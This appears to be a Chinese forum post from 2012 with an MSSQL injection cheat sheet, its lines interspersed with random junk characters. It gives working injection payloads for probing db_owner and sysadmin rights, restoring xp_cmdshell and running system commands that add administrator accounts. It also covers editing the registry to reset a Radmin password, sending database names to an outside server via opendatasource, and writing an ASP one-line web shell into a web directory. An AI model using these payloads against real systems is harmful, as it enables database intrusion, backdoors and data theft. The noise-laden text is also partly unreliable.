//看看是什么权限的
: ~3 R5 o- r% P: [+ l7 \1 Nand 1=(Select IS_MEMBER('db_owner'))5 H! W, a* i, ?+ Z+ G
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--7 O" B7 o3 b& Z
* h" x3 l9 u8 n: ?9 z//检测是否有读取某数据库的权限* V" [* V. X( b4 e6 `: M) P4 |
and 1= (Select HAS_DBACCESS('master'))# m! ^7 K, F6 r. N) s5 j
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --' p, i4 T; I9 N, q) ^% m
, I" { @, z4 k \; J
1 `3 A3 y/ {9 P: Y4 v, I: `数字类型, c4 N% p. D' L( K
and char(124)%2Buser%2Bchar(124)=03 k- K# Y2 e( x; M+ i; q4 g, e
8 q; z) O* k' `. s3 k+ ~( s0 H
字符类型( J9 M" E7 E) E1 o- J" c
' and char(124)%2Buser%2Bchar(124)=0 and ''='% V7 n1 z2 `2 { H! n& B
* g; r- ]/ Y% j0 S
搜索类型( C3 W8 a: N% B) V, {) y* y
' and char(124)%2Buser%2Bchar(124)=0 and '%'='+ L9 `- s6 _' f. o
) f% F" R5 [. |% W c- j! k
爆用户名. w2 b. Y+ {5 N
and user>0
, k# |7 j* F6 X2 c( }8 a' and user>0 and ''='% W$ S5 X! X# O( ? m
/ U( N/ B- Y/ c0 M) I% K; J( S3 x
检测是否为SA权限! Z. N/ c- d* D# G$ L* S
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
) y' p) ]6 I6 R* b, Q; XAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --+ w3 I! v& O. Z! J1 @1 f
7 e I9 s! g! c: w) y- @
检测是不是MSSQL数据库7 x% s# A, [2 u/ L2 _0 Q
and exists (select * from sysobjects);--
8 Z: J# p0 P" g* h6 V0 f
2 s; T% n% Y0 \& t4 R, b8 R5 Y检测是否支持多行
0 h" ~+ \5 ]: z;declare @d int;--& e6 d0 h" x9 i% J; f
0 e& p! h5 }% p/ u
恢复 xp_cmdshell/ X, d( q" g% e3 y/ b
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
3 g# \ e: y+ C8 r" C; s( e; [: I- |+ F& i2 w% M- U
5 W3 f; E2 z& }# \7 Q2 N) O
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')& S# _% ]% l$ k/ F( D4 O6 t. Z
) q/ j' m3 K7 L$ _! @0 \% X7 x//-----------------------
" S3 w- n5 C! y3 ?// 执行命令
3 }0 I5 k `8 N4 {5 {) D0 e, i//-----------------------' [: E3 [1 D4 O% s* F
首先开启沙盘模式:
- D" c5 Z" }# o {5 Nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1# I* X" ?5 n& F, X7 p- H0 ]* I3 I
" y9 K2 ~) S4 _ E* G然后利用jet.oledb执行系统命令
+ P4 R- ~5 ], |3 M6 Wselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')( f' S# |, b4 a
: ]3 \3 o/ n# |5 h7 T8 V
执行命令
; d1 V- {* Q4 |;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--3 V, M' c9 L" o3 M( {' a
4 _$ r5 L0 S0 J8 kEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
: g- Q' ?: y6 Y9 ^9 m; Z8 s' U- P& Q
判断xp_cmdshell扩展存储过程是否存在:
% v! m1 D# N9 Chttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
1 j+ u, s4 I6 g7 Q' ` J+ ~5 C A6 {) Q- u$ W
写注册表/ _) \3 z* K% y" B( O: T" A% J
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: Q/ d: U. ~. o4 Z: f& c9 `
* b7 q7 u& c- g. X, C! wREG_SZ
) {8 z& L) T; H) [" V$ [6 v( Q y) G
读注册表" f% x+ X! U3 ]0 m7 j
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
; z- n, i P2 \2 q* ?* q- O" {$ ~3 L1 D- c/ q" K: Q
读取目录内容0 q1 q, g' S: r
exec master..xp_dirtree 'c:\winnt\system32\',1,1# |( u% g0 \. y" G0 }
' T$ a' ^. X/ p. W D0 V
/ i; _' E: j7 M- V* p: m数据库备份
& }. K: W" J, x, E4 bbackup database pubs to disk = 'c:\123.bak'
2 c/ N: ~! W/ a# v* z, c) `
" { w; l* \6 x# w: t! q, ~//爆出长度8 M7 N' R0 }% ~) t- l; f- m) E
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--4 D( v% m3 W+ D, H6 C% ^
4 T2 y0 H- {7 G% a! K8 B% Y1 L
, s/ B& p" }& T8 c3 D |5 A, g" ?
3 y& a8 Q4 F6 i更改sa口令方法:用sql综合利用工具连接后,执行命令:
( e- f$ w: z/ V/ H N( t2 l5 i" n) S; rexec sp_password NULL,'新密码','sa'
! J0 N) z! y3 I; E+ k
8 P1 P0 U" ^* k- S' o添加和删除一个SA权限的用户test:
' E% {' J* w! i1 {* Texec master.dbo.sp_addlogin test,9530772/ Q$ }7 d) k& J" ?
exec master.dbo.sp_addsrvrolemember test,sysadmin* L% d7 A& P; { i- m! @/ P2 t* B( ^
% P/ e* T9 y2 n' M6 A1 E+ Y% ]删除扩展存储过过程xp_cmdshell的语句:
: Z# l" g; O! O, L) L& M7 bexec sp_dropextendedproc 'xp_cmdshell'
$ P# P; F) C! |' ^) e
$ l2 K" [: i# h8 ]$ X- Z1 ]添加扩展存储过过程 w2 M# S1 _# j
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
! U# R+ c6 q$ k/ l0 q- f3 ~. E5 t* [GRANT exec On xp_proxiedadata TO public! ~4 b0 b X4 N" V
1 Z x; T. g& V5 h1 g
/ |5 ^# u' l6 a8 b- P8 g J停掉或激活某个服务。
6 T7 u7 S7 a9 n! Y) |
0 m9 q! W! J- N0 F4 ^9 eexec master..xp_servicecontrol 'stop','schedule'
" y2 F- D. ]. L' p5 t. c" oexec master..xp_servicecontrol 'start','schedule'% j. ~6 E* f& ~6 @
* E' x, p k/ @2 kdbo.xp_subdirs" A+ }; P! h" q4 F/ Q
- E' x2 z3 M, q% j3 b. v' X1 L8 q
只列某个目录下的子目录。0 k. L0 J% F; M! |( W$ Z2 {7 {% d
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
- z& d7 L: W7 ]/ `7 P
4 b) P5 n. i8 @! ^, z% h0 M/ zdbo.xp_makecab2 Q+ l) A( a2 u
' {% `1 ` S) S, S
将目标多个档案压缩到某个目标档案之内。
$ B+ g: u, g& p- T. P所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。7 `: S6 E* l, K# [
& A# b7 }) O. m/ p; y5 q$ Y
dbo.xp_makecab1 f: G1 }. _0 q4 \9 F5 ]
'c:\test.cab','mszip',1,
- n5 t7 T6 Z* h: D; q'C:\Inetpub\wwwroot\SQLInject\login.asp',: J" e2 e5 d2 S/ }* H2 o5 ^
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'3 `+ r" e/ Z, H/ I" r
) J8 J0 Q# W: M" a2 c9 ^$ \. b8 @4 g7 {
xp_terminate_process
. ?& y+ H. _+ ^8 h0 j6 U7 n, H& B4 y# B, h% x `$ H
停掉某个执行中的程序,但赋予的参数是 Process ID。4 f1 u2 `" Y+ K8 D) t; M
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
0 v' j" X7 m: | Y! O. F% {% c/ x, x' g# L
xp_terminate_process 2484* _$ Q0 a' S0 j9 v" e: Z. j
/ n7 b5 a) W2 l$ D
xp_unpackcab( N4 L/ ]5 I1 x- U# Q
; A$ C- K7 }5 X: S* E% f( K1 W解开压缩档。3 V. p- ^! v0 a7 c& s+ M0 _
^ F/ o) H y4 Gxp_unpackcab 'c:\test.cab','c:\temp',1* h0 s3 z! X) v9 B' y
: e, ^7 @, Y& R) D" y- V" }7 y% Z6 ^6 ]& Q0 V
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12340 i$ U6 ]$ @6 B) W
7 I& K T$ A. `4 v8 K% Rcreate database lcx;# a0 o) `. }6 A1 g7 [) u1 n
Create TABLE ku(name nvarchar(256) null);
6 Z: v+ r. _: S. DCreate TABLE biao(id int NULL,name nvarchar(256) null);; @: ~( y8 z! L1 e/ i, l
4 g' L* c$ i9 k4 P
//得到数据库名
K6 H& {: w2 I% l- Ainsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases4 T. t' T, N4 i: ~5 [
6 p& O+ ` P. O ~% T( w1 `& p2 X4 F# R! M/ ~; C @) x8 `5 ~$ _
//在Master中创建表,看看权限怎样
+ w3 J9 V; b0 U) T/ i) [/ xCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
8 W' l/ |/ ]2 g$ ~, {8 I$ Y$ t/ D" y! K! ~
用 sp_makewebtask直接在web目录里写入一句话马:: o) A$ h {3 k
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--& S1 u: ^( ]$ z; [
9 L0 D7 i9 {) [9 ^7 z. N" ^- x; A3 R//更新表内容" I9 K- N; K( Y0 ~* H7 w h* D `
Update films SET kind = 'Dramatic' Where id = 1238 V) {) ?4 m6 O ?2 w/ s; D/ M
& \, R& b0 d7 h7 a: F//删除内容- j4 T* [' z0 w/ g1 D) X; o, N
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对